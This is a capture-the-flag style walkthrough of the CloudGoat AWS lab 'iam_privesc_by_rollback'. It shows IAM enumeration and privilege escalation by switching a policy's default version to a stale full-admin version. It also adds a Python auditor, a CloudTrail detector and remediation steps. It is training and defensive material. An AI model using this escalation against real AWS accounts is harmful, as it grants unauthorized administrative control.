CloudGoat: iam_privesc_by_rollback

0xLeeBai
2 min read · May 7, 2024


Note:

  • This walkthrough is run from Kali Linux
  • Ensure you have completed the prerequisites before starting the lab

1. Preparation

1.1 Launch the scenario:

┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create iam_privesc_by_rollback

1.2 Read start.txt

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd iam_privesc_by_rollback*
┌──(root㉿kali)-[/opt/cloudgoat/xxx]
└─# cat start.txt

aws_account_id = xxx1
policy_arn = xxx2
raynor_access_key_id = xxx3
raynor_secret_key = xxx4
username = xxx5

2. Enumeration

2.1: Create an AWS CLI profile for the raynor user

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile raynor

AWS Access Key ID: xxx3
AWS Secret Access Key: xxx4
Default region name:
Default output format:

2.2: whoami (confirm which identity the keys belong to)

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws sts get-caller-identity --profile raynor --region us-east-1

{
    "UserId": "...",
    "Account": "...",
    "Arn": "arn:aws:iam::1234:user/raynor-iam_privesc_by_rollback_cgida6jux7d1r7"
}

2.3: Policy enumeration

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam list-attached-user-policies --user-name raynor-iam_privesc_by_rollback_cgida6jux7d1r7 --profile raynor

{
    "AttachedPolicies": [
        {
            "PolicyName": "cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7",
            "PolicyArn": "arn:aws:iam::xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7"
        }
    ]
}
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam get-policy --policy-arn arn:aws:iam::xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7 --profile raynor

{
    "Policy": {
        ... ... ...
        "DefaultVersionId": "v1",
        ... ... ...
    }
}
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam list-policy-versions --policy-arn arn:aws:iam::xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7 --profile raynor

{
    "Versions": [
        {"VersionId": "v5", "IsDefaultVersion": false},
        {"VersionId": "v4", "IsDefaultVersion": false},
        {"VersionId": "v3", "IsDefaultVersion": false},
        {"VersionId": "v2", "IsDefaultVersion": false},
        {"VersionId": "v1", "IsDefaultVersion": true}
    ]
}
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam get-policy-version --policy-arn arn:aws:iam::xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7 --profile raynor --version-id v1

{
    "PolicyVersion": {
        "Document": {
            ... ... ...
            "Statement": [
                {
                    "Action": [
                        "iam:SetDefaultPolicyVersion",
                        ... ... ...
                    ],
                    "Effect": "Allow",
                    "Resource": "*",
                    "Sid": "IAMPrivilegeEscalationByRollback"
                }
            ]
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        ... ... ...
    }
}
  • v1 (the current default) grants “iam:SetDefaultPolicyVersion”, so the raynor user can potentially switch the policy's default to another of its stored versions
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam get-policy-version --policy-arn arn:aws:iam::xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7 --profile raynor --version-id v2

{
    "PolicyVersion": {
        "Document": {
            ... ... ...
            "Statement": [
                {
                    "Action": "*",
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v2",
        "IsDefaultVersion": false,
        ... ... ...
    }
}
  • v2 allows every action on every resource
  • if we use iam:SetDefaultPolicyVersion to make v2 the default version, the raynor user inherits all of those permissions
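The enumeration above shows the root cause of this scenario: a least-privilege default version sitting in front of a stale, fully permissive one, on a policy whose own holder may set the default version. The script below is an added example (not part of the original post or of CloudGoat) that audits a customer-managed policy for exactly that combination, working from the same data that `get-policy`, `list-policy-versions` and `get-policy-version` return. The sample version documents are constructed to mirror the v1 and v2 shown above; `collect_from_aws` assumes a boto3 IAM client and is only needed against a live account.

```python
import json
from typing import Dict, List, Tuple

# Constructed sample: the two versions seen in the walkthrough. v1 is the
# default and grants only read + SetDefaultPolicyVersion; v2 is a stale
# AdministratorAccess-equivalent. (v3-v5 are omitted for brevity.)
SAMPLE_VERSIONS: Dict[str, dict] = {
    "v1": {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "IAMPrivilegeEscalationByRollback",
            "Effect": "Allow",
            "Action": ["iam:Get*", "iam:List*", "iam:SetDefaultPolicyVersion"],
            "Resource": "*",
        }],
    },
    "v2": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
    },
}
SAMPLE_DEFAULT = "v1"


def _as_list(value) -> list:
    """IAM accepts a scalar or a list for Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _allow_statements(document: dict) -> List[dict]:
    stmts = _as_list(document.get("Statement"))
    return [s for s in stmts if s.get("Effect") == "Allow"]


def grants_action(document: dict, action: str) -> bool:
    """True if an Allow statement names `action` exactly, via '*', or via a
    trailing-wildcard glob such as iam:Set*. NotAction and Condition blocks
    are deliberately not evaluated; treat a hit as 'needs review', not proof."""
    for s in _allow_statements(document):
        for a in _as_list(s.get("Action")):
            if a == "*" or a.lower() == action.lower():
                return True
            if a.endswith("*") and action.lower().startswith(a[:-1].lower()):
                return True
    return False


def is_full_admin(document: dict) -> bool:
    """Allow with Action '*' on Resource '*' and no Condition."""
    for s in _allow_statements(document):
        if "*" in _as_list(s.get("Action")) and "*" in _as_list(s.get("Resource")) \
                and "Condition" not in s:
            return True
    return False


def assess_policy(versions: Dict[str, dict], default_version: str) -> dict:
    """Report the rollback exposure of one policy: which non-default versions
    are broader than the default, and whether the default itself hands out the
    permission needed to flip the pointer (the walkthrough's precondition)."""
    default_doc = versions[default_version]
    stale_admin = sorted(
        v for v, doc in versions.items()
        if v != default_version and is_full_admin(doc) and not is_full_admin(default_doc)
    )
    can_flip = grants_action(default_doc, "iam:SetDefaultPolicyVersion")
    return {
        "default_version": default_version,
        "default_can_set_default_version": can_flip,
        "stale_admin_versions": stale_admin,
        "rollback_escalation_possible": bool(stale_admin) and can_flip,
    }


def collect_from_aws(iam_client, policy_arn: str) -> Tuple[Dict[str, dict], str]:
    """Fetch the same inputs from a live account (assumes a boto3 IAM client)."""
    default = iam_client.get_policy(PolicyArn=policy_arn)["Policy"]["DefaultVersionId"]
    docs = {}
    for v in iam_client.list_policy_versions(PolicyArn=policy_arn)["Versions"]:
        pv = iam_client.get_policy_version(PolicyArn=policy_arn, VersionId=v["VersionId"])
        docs[v["VersionId"]] = pv["PolicyVersion"]["Document"]
    return docs, default


if __name__ == "__main__":
    print(json.dumps(assess_policy(SAMPLE_VERSIONS, SAMPLE_DEFAULT), indent=2))
```

The fix on the defender's side is to remove the stale versions rather than rely on the default pointer: `aws iam delete-policy-version --policy-arn <arn> --version-id v2` (repeat for every version that is broader than the default), and to keep `iam:SetDefaultPolicyVersion` and `iam:CreatePolicyVersion` out of policies held by the principals those policies are attached to. A policy can only hold five versions, so old ones tend to accumulate exactly as this scenario shows.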

3. Exploitation

3.1: Privilege escalation via iam:SetDefaultPolicyVersion

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam set-default-policy-version --policy-arn arn:aws:iam::xxx:policy/cg-raynor-policy-iam_privesc_by_rollback_cgida6jux7d1r7 --version-id v2 --profile raynor

{
    "Policy": {
        ... ... ...
        "DefaultVersionId": "v2",
        ... ... ...
    }
}
  • the default version is now v2, so the raynor user holds the permissions of that version
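The step above leaves a clear trail: a single IAM `SetDefaultPolicyVersion` call, recorded by CloudTrail under `eventSource` `iam.amazonaws.com` with the policy ARN and the chosen `versionId` in `requestParameters`. The detector below is an added example (not part of the original post) that runs over a constructed CloudTrail export and flags both the pointer flip used here and `CreatePolicyVersion` with `setAsDefault`, which reaches the same end state in one call. Account id, ARNs, IPs and timestamps in the sample are placeholders; the metric-filter pattern is given for a trail delivered to CloudWatch Logs and is not executed by the script.

```python
import json
from typing import List

ACCT = "111111111111"                      # placeholder account id
USER_ARN = f"arn:aws:iam::{ACCT}:user/raynor-xxx"
POLICY_ARN = f"arn:aws:iam::{ACCT}:policy/cg-raynor-policy-xxx"
ROLE_ARN = f"arn:aws:sts::{ACCT}:assumed-role/deploy-role/ci"

# Constructed CloudTrail records modelled on the walkthrough: read-only
# enumeration, the successful flip to v2, a denied attempt on v5, a CI role
# publishing a new default version, and a non-default version creation.
SAMPLE_CLOUDTRAIL = json.dumps({"Records": [
    {"eventTime": "2024-05-07T10:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "ListPolicyVersions", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "userName": "raynor-xxx", "arn": USER_ARN},
     "requestParameters": {"policyArn": POLICY_ARN}},
    {"eventTime": "2024-05-07T10:01:30Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "userName": "raynor-xxx", "arn": USER_ARN},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v2"}},
    {"eventTime": "2024-05-07T10:02:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "userName": "raynor-xxx", "arn": USER_ARN},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v5"},
     "errorCode": "AccessDenied"},
    {"eventTime": "2024-05-07T11:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreatePolicyVersion", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN},
     "requestParameters": {"policyArn": POLICY_ARN, "setAsDefault": True}},
    {"eventTime": "2024-05-07T11:05:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreatePolicyVersion", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN},
     "requestParameters": {"policyArn": POLICY_ARN, "setAsDefault": False}},
]})

# API calls that change which version of a managed policy is in force.
POLICY_VERSION_EVENTS = {"SetDefaultPolicyVersion", "CreatePolicyVersion"}

# Same selection as a CloudWatch Logs metric-filter pattern (reference only).
METRIC_FILTER_PATTERN = (
    '{ ($.eventSource = "iam.amazonaws.com") && '
    '(($.eventName = "SetDefaultPolicyVersion") || ($.eventName = "CreatePolicyVersion")) }'
)


def policy_version_alerts(cloudtrail_json: str) -> List[dict]:
    """Return one alert per event that changed (or tried to change) a policy's
    default version. Denied attempts are kept: a principal probing which
    versions it may activate is itself worth a look."""
    alerts = []
    for r in json.loads(cloudtrail_json)["Records"]:
        if r.get("eventSource") != "iam.amazonaws.com":
            continue
        name = r.get("eventName")
        if name not in POLICY_VERSION_EVENTS:
            continue
        params = r.get("requestParameters") or {}
        if name == "CreatePolicyVersion" and not params.get("setAsDefault"):
            continue  # new but inactive version: no change in effective permissions yet
        ident = r.get("userIdentity") or {}
        succeeded = "errorCode" not in r
        # An IAM user with long-lived keys flipping the pointer by hand is the
        # shape seen in this scenario; a deploy role publishing a new default is
        # usually routine change management, so it gets a lower severity.
        high = succeeded and name == "SetDefaultPolicyVersion" and ident.get("type") == "IAMUser"
        alerts.append({
            "time": r.get("eventTime"),
            "event": name,
            "actor": ident.get("arn"),
            "actor_type": ident.get("type"),
            "policy_arn": params.get("policyArn"),
            "version_id": params.get("versionId"),
            "source_ip": r.get("sourceIPAddress"),
            "succeeded": succeeded,
            "severity": "high" if high else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in policy_version_alerts(SAMPLE_CLOUDTRAIL):
        print(json.dumps(a))
```

When a high-severity hit fires, the follow-up is the same data the enumeration section used: `get-policy-version` on the activated version tells you how much access was just gained, and `list-attached-user-policies` / `list-entities-for-policy` tells you which principals now hold it.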

4. Clean up

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy iam_privesc_by_rollback

Destroy xxx [y/n]: y
